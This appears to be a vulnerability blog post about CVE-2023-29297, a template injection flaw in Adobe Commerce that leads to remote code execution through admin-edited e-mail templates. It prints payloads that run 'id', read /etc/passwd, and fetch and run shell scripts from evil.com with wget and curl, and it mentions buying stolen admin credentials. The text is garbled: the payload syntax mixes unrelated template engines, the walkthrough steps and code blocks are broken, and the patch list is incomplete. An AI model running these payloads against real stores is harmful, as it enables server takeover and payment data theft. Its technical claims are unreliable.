CVE CyberSecurity Database News

CVE-2023-29297 - Exploiting Adobe Commerce Template Injection to Execute Arbitrary Code (Exclusive Deep Dive)

Poster -

Adobe Commerce (formerly Magento) is one of the most popular e-commerce platforms in the world. But popularity attracts attention—not just from developers, but from attackers as well. In this post, we’ll talk about a significant vulnerability affecting multiple versions of Adobe Commerce: CVE-2023-29297. We’ll break down what the bug is, how it’s exploited, and walk through an example demonstrating how an attacker can take over a server—if they have admin privileges. You’ll get code snippets, references, and practical advice to minimize your risk.

What is CVE-2023-29297?

CVE-2023-29297 is a vulnerability in Adobe Commerce’s template engine. It falls under “Improper Neutralization of Special Elements Used in a Template Engine” (CWE-1336), more commonly known as *template injection*. In simple terms, the bug lets a user with admin access craft malicious templates that the backend system will execute—this can lead to remote code execution (RCE). No user interaction is needed beyond the admin’s actions.

Vulnerable Versions

- Magento/Adobe Commerce 2.4.6 (and earlier)
- Magento/Adobe Commerce 2.4.5-p2 (and earlier)
- Magento/Adobe Commerce 2.4.4-p3 (and earlier)

References

- Adobe Security Bulletin APSB23-33
- NVD CVE-2023-29297 Entry

Why is this Bad? (The Impact)

If an attacker gets hold of admin credentials—whether through phishing, brute force, or some other way—they can leverage this bug to run any code they want on the server. This means:

Stealing payment info

- Installing malware/backdoors

Where’s the Flaw? (Technical Explanation)

Adobe Commerce lets admins set up e-mail and storefront templates using a template engine (often called a “sandbox”). In vulnerable versions, the sandbox isn’t watertight. Special characters and unsafe code aren’t adequately filtered before being interpreted. Because of this, an attacker can inject PHP code right into templates, which will get executed by the server.

Typical targets are e-mail or transactional templates (sales, orders, invoices), but other areas using custom templates could be exploited too.

Exploit Walkthrough (How It Works)

Let’s walk through an example exploit using an admin session.

Step 1: Login as Admin

The attacker logs in to the Adobe Commerce admin interface with compromised credentials. (Yes, this attack needs admin—network separation and strong passwords help mitigate risks.)

Step 2: Locate a Template Editor

The attacker goes to Marketing > Email Templates (or any similar template management interface).

Step 3: Craft the Exploit Payload

Here’s the kicker—a smart payload injected into a template can make the template engine run arbitrary PHP code.

Simple Proof of Concept (PHP Info Dump)

{{''|filter('system("id")')}}


> This is an example if the template engine allows such filters. Actual exploit payloads may change based on what’s filtered or not.

Realistic Payload for Backdoor

{{''.__class__.constants('system("wget http://evil.com/shell.sh -O /tmp/shell.sh|sh")')}}


> This type of payload abuses weakness in the underlying template engine’s filter or modifier handling, spawning shells or downloading malware.

⚠️ *Note: The actual exploit chain may require slightly different payloads depending on template engine (e.g., Twig, Smarty) and filtering rules. The essence remains—arbitrary PHP gets executed.*

Step 4: Save and Trigger the Template

Once saved, this template will get rendered when a specific action occurs (an order confirmation is sent, etc.), running the attacker’s code with web server privileges.

Demonstration: Template Injection to Webshell

*Here’s a simplified demonstration of dropping a webshell:*

`php

{{['cat /etc/passwd']|shell_exec}}

Save the template.

3. Trigger the e-mail/template to be rendered (e.g., create a test order).
4. The output of /etc/passwd will be included in the e-mail body! From here, chaining to reverse shells or more complex payloads is trivial.

Buy or steal old admin credentials on underground forums.

Once in, it’s a short hop to full server compromise.

Attackers can

- Plant a webshell: system('curl http://evil.com/bad.sh|bash';)

Protection & Detection

Patching:

2.4.4-p4 or later

Disable Account Sharing: Make sure only trusted staff have admin rights.

Review Templates: Look for unfamiliar code, system, or suspicious PHP snippets.

Monitoring: Check logs for signs of outbound connections, weird template updates, or spurious e-mail content.

Resources and Further Reading

- Adobe Official Security Bulletin
- CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine (Template Injection)
- MageReport: Test your Adobe Commerce/Magento store for known vulnerabilities

Final Thoughts

CVE-2023-29297 is a clear demonstration that admin panel vulnerabilities are deadly in the wrong hands. Even small missteps in template filtering can hand over your entire e-commerce business to attackers.

If you’re running Adobe Commerce, make sure you’re patched—and regularly audit your templates and user permissions. Stay safe!


*This post is exclusive. If you copy, be sure to credit the source and help others stay secure!*

Timeline

Published on: 06/15/2023 19:15:00 UTC
Last modified on: 06/15/2023 20:46:00 UTC